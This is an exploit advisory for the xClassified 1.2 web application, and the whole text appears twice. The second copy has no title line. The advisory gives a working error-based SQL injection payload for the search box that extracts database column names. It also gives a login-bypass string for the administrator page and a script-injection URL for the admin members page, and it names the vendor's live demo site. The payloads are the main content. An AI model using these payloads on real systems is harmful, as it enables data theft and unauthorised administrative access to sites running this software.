# Exploit Title : xClassified 1.2 Multiple Vulnerabilities
# Vendor : http://xclassified.artifectx.com/
# Date Found : 2014-07-08
Vulnerabilities : SQL Injection / Login Bypass / XSS
=================
Discovery Status:
=================
Published
Exploitation Technique:
=======================
Remote
Severity Level:
===============
Critical
---------------------
SQL Injection :
Method : POST In Search Section .
Input Your SQLi Payload In Search TextBox .
example payload : 'and(select 1,2 from(select count(*),concat((select concat(column_name) from information_schema.columns where table_schema=0x78636C6173736966696564 and table_name=0x75736572 limit 0,1),floor(rand(0)*2)) from information_schema.tables group by 2)a)and'
Response : Duplicate entry 'UserId1' for key 'group_key'
---------------------
Login Bypass :
Admin Page : TARGET/administrator/
String For Bypass : '=' 'or'
---------------------
Cross Site Scripting (XSS) :
[After Login In Admin Page]
Method : GET
http://TARGET/demo/administrator/members.php?actionuser="><script>alert(/Hadi/)</script>
---------------------
Demo : http://xclassified.artifectx.com/demo/
---------------------
Credit : Hadi Arjmand , SeCTime.Ir
Thanks To Mr.HS3c - All Iranian Researchers And Exploiters
----- End -----
//The information contained within this publication is
//supplied "as-is"with no warranties or guarantees of fitness
//of use or otherwise. Bot24, Inc nor Bradley Sean Susser accepts
//responsibility for any damage caused by the use or misuse of
//this information
# Vendor : http://xclassified.artifectx.com/
# Date Found : 2014-07-08
Vulnerabilities : SQL Injection / Login Bypass / XSS
=================
Discovery Status:
=================
Published
Exploitation Technique:
=======================
Remote
Severity Level:
===============
Critical
---------------------
SQL Injection :
Method : POST In Search Section .
Input Your SQLi Payload In Search TextBox .
example payload : 'and(select 1,2 from(select count(*),concat((select concat(column_name) from information_schema.columns where table_schema=0x78636C6173736966696564 and table_name=0x75736572 limit 0,1),floor(rand(0)*2)) from information_schema.tables group by 2)a)and'
Response : Duplicate entry 'UserId1' for key 'group_key'
---------------------
Login Bypass :
Admin Page : TARGET/administrator/
String For Bypass : '=' 'or'
---------------------
Cross Site Scripting (XSS) :
[After Login In Admin Page]
Method : GET
http://TARGET/demo/administrator/members.php?actionuser="><script>alert(/Hadi/)</script>
---------------------
Demo : http://xclassified.artifectx.com/demo/
---------------------
Credit : Hadi Arjmand , SeCTime.Ir
Thanks To Mr.HS3c - All Iranian Researchers And Exploiters
----- End -----
//The information contained within this publication is
//supplied "as-is"with no warranties or guarantees of fitness
//of use or otherwise. Bot24, Inc nor Bradley Sean Susser accepts
//responsibility for any damage caused by the use or misuse of
//this information